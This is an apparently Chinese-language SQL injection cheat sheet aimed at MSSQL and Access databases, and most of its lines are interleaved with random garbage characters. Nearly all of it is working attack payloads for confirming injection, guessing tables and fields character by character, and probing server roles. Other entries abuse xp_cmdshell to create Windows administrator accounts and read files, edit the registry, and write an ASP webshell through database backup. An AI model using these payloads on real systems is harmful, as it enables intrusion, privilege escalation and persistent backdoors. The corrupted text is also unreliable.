1.判断是否有注入;and 1=1 ;and 1=2 �'1��T� v1
2.初步判断是否是mssql ;and user>0 =GS_ G�;Dz
�-wHG����i
3.注入参数是字符'and [查询条件] and ''=' �uX��5B>32
� x��+j/v5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �5D@��Q1��
r?{�LQWP>e
5.判断数据库系统 ri.|EmH2:D
�Y&:\s�8C
;and (select count(*) from sysobjects)>0 mssql }��j��y7,+
Bf}0'MK8zQ
;and (select count(*) from msysobjects)>0 access r�-DD�*�'R
4x�C�6#�:8
j1C0LP��8�
!7Q��.w/|=
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �9"v �ox��
J�L*]�9$o
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 O9� �r44ww
?Pf
,5=*�B
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 OaVL N�A^{
<@2?2l+�`X
9.(1)猜字段的ascii值(access) _rWXcK3cjr
tbt9V2U:"n
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �_3?x��IT�
:z�Tj"P>"I
(2)猜字段的ascii值(mssql) J'oz P�^N
��I��,q~*d
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
TO�P'�Bmb
m*WEge*$�t
10.测试权限结构(mssql) NomK(%8m�$
,wy:�RVv@e
�~�1z8G�>R
W;j)ux7jMY
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ntUVh�I�E0
��Ts�� *'f
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �6�v#�s�q�
s�`#j8>`M
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- qdnNap�Wnc
nF�OG=>c}�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~wV9�8u�-N
v�Ta2�3YDW
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ]-]@=q�Yu
�I�(eR3d:�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 1>�*<K/\qg
2/NWWo�Kw�
;and 1=(select IS_MEMBER('db_owner'));-- �#r�L�@��
�W8�/���6�
7
@Qlp$[F�
N��r�7.BDA
11.添加mssql和系统的帐户 l`G:@�}P>G
�o��ieLh"$
;exec master.dbo.sp_addlogin username;-- ��^hTJ�p�{
;exec master.dbo.sp_password null,username,password;-- p_�y*-,W
(
tg��4&j$��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- p�h.�:~n>z
$B�N�+S�D!
;exec master.dbo.xp_cmdshell 'net user username password eH�Z��l-|-
;(��V�a_
�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �?~9X:~�6\
uy28�=B��E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 8�i�~'~�/x
�w6Ny>(T�/
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �0L-g'^nn�
(3S/"���ZE
�V�Zl0)YLK
*�/qc%!YV9
12.(1)遍历目录 aYX�'&�k
`
?-p aM5Q�+
;create table dirs(paths varchar(100), id int) u+I3�VK�_)
c_=zd6 b$S
;insert dirs exec master.dbo.xp_dirtree 'c:\'
�MO+0]uh:
�,�l"2MXD�
;and (select top 1 paths from dirs)>0 %�6?�}gc_
P��?-4�4m#
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) e=$xn3)McY
!I
��
P*��
s_+XSH[�=f
~�d8o,.n`1
(2)遍历目录 a�g�o�t
(�
P�h�d�L@Mr
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �B�Aed� �[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 _Xe< JJv�q
^W*)�3;5��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 FX��%��E7H
:j�CaD��hK
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?�XrTZ�{5'
TU�Cp��m�j
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2o}FB�\4^i
7��i\[Q�8f
5Wjp_^�!e
uU"�s50m��
13.mssql中的存储过程 6!m#_z8qG3
�p{GD���W_
xp_regenumvalues 注册表根键, 子键 FV,�S��A3�
�mjc:0�hH�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2)�]*re�)�
[�^��P2�Kn
xp_regread 根键,子键,键值名 ����{���[#
k82L��CV+6
;exec xp_regread "6�h.6_bTw
�7t/SZ�m��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �g#NU��o�/
*]u��/,wCB
xp_regwrite 根键,子键, 值名, 值类型, 值 eH�IC'�b.
��<<6#Uz.1
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @1X1E 2:�
[#�H8Mb�+7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ~)(D�m�+vZ
�q|�\C��p
xp_regdeletevalue 根键,子键,值名 a2n#T,�kq&
�6n�g9 �o6
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ,\"gN5[�$(
���y�Fv3>\
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 =-�T�etp�
.v!�e=i}.�
X�^)5O>>|t
,bg#pG!x Q
14.mssql的backup创建webshell �]>j�_
Y�,
��-': tpJk
use model ��BG�OI��
YkbLf#2AE|
create table cmd(str image); KO7c�Z��ME
H2-�(����
insert into cmd(str) values (''); P]^]�
T�}5
4�(]('��[M
backup database model to disk='c:\l.asp'; HX^
P�9jXT
�^4i3��#}�
C�dj��G�YS
�w?"l4.E%
15.mssql内置函数 ->UrW�W��^
v�.J#d>tvf
;and (select @@version)>0 获得Windows的版本号 ~KvCb�3~�X
$'w���l{D"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa X�[}%iEWzT
pon�v�i42u
;and (select user_name())>0 爆当前系统的连接用户 (d�\bSo�$]
Vh&KfYY���
;and (select db_name())>0 得到当前连接的数据库 |M&/�(���0
�>Li?@+Zl�
-tJ*F!�w6U
?�U�[AE -*
16.简洁的webshell UN�a�e&Zir
2sH��5<5G'
use model .�`�9KB��3
Mf"B!WU>]B
create table cmd(str image); stScz�#!�
9��IMcp~zX
insert into cmd(str) values (''); �e)8iPu ..
�)k�Uw,F=6
backup database model to disk='g:\wwwtest\l.asp';
